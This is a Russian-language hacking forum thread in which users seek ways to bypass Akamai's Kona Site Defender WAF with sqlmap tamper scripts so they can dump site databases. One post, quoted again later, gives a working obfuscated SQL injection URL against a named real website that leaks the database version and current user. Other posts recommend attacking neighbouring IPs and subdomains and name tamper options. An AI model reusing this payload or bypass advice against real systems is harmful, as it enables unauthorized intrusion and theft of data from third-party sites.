WAF Kona Site Defender (Akamai Technologies)

Xrenovi4 · 11.08.2019

Столкнулся с проблемой, что на сайтах с алексой меньше 30к стоит такого типа ваф и подобрать под него темперы не получается.
Какие из темперов в мапе наиболее оптимально подходят под данный ваф?

BabaDook · 11.08.2019

Никаке. Говорят, что разработчики вафа нанимают хакеров и платят норм деньги за байпасы.

Xrenovi4 · 11.08.2019

BabaDook сказал(а):

Никаке. Говорят, что разработчики вафа нанимают хакеров и платят норм деньги за байпасы.

В таком случае исключительно ручное преобразование пайлоада?

BabaDook · 11.08.2019

Xrenovi4 сказал(а):

В таком случае исключительно ручное преобразование пайлоада?

Я встречал только sql байпас, и он был сделан руками. Как автоматизировать.... Не знаю... Вообще все зависит не от фирмы ВАФа , а от его настроек. Так что тут трудно дать нормальный совет как быть. Только если пробовать руками, искать варианты, дальше править пейлоды в настройках sqlmap

Xrenovi4 · 11.08.2019

BabaDook сказал(а):

Я встречал только sql байпас, и он был сделан руками. Как автоматизировать.... Не знаю... Вообще все зависит не от фирмы ВАФа , а от его настроек. Так что тут трудно дать нормальный совет как быть. Только если пробовать руками, искать варианты, дальше править пейлоды в настройках sqlmap

Понял, спасибо, значит буду как баран смотреть на новые ворота)

RedBear · 12.08.2019

BabaDook сказал(а):

Никаке. Говорят, что разработчики вафа нанимают хакеров и платят норм деньги за байпасы.

++

Да и обход конкретного ваф, как обход АВ в рантайме - просто так никто не поделится.
Может имеет смысл посмотреть смежные цели - на том же IP(или даже из той же подсети диапазон), или на поддоменах.

Xrenovi4 · 12.08.2019

RedBear сказал(а):

++

Да и обход конкретного ваф, как обход АВ в рантайме - просто так никто не поделится.
Может имеет смысл посмотреть смежные цели - на том же IP(или даже из той же подсети диапазон), или на поддоменах.

Организации такие, что они везде его поставят скорей всего, им это все равно что жвачку купить

BabaDook · 12.08.2019

Друг из Бангладеша байпасил

HTML:

http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280x20%2c%30x496e6a65637465642042792065536563204861783072,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn--%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30x27--%20-

Кстати, год назад не работал этот запрос

Кузя · 04.09.2019

Xrenovi4 сказал(а):

Столкнулся с проблемой, что на сайтах с алексой меньше 30к стоит такого типа ваф и подобрать под него темперы не получается.
Какие из темперов в мапе наиболее оптимально подходят под данный ваф?

Ня)
есле не зорабодаед - тогды пеши, поещу еще (не ты ж один дампышь да пищ-пищ тестирушь вебсойты =) )

Скрытый контент для пользователей: .

Кузя · 04.09.2019

там ещо воркад тамперс рандомкасе и 0х2чар

BabaDook сказал(а):
Друг из Бангладеша байпасил
HTML:
http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280x20%2c%30x496e6a65637465642042792065536563204861783072,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn--%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30x27--%20-
Кстати, год назад не работал этот запрос

J3tixProd · 30.09.2019

Акамай достаточно жёсткий ваф)

WAF Kona Site Defender (Akamai Technologies)

Xrenovi4

Скидди

BabaDook

(L1) cache

Xrenovi4

Скидди

BabaDook

(L1) cache

Xrenovi4

Скидди

RedBear

RAID-массив

Xrenovi4

Скидди

BabaDook

(L1) cache

Кузя

(L3) cache

Кузя

(L3) cache

J3tixProd

RAID-массив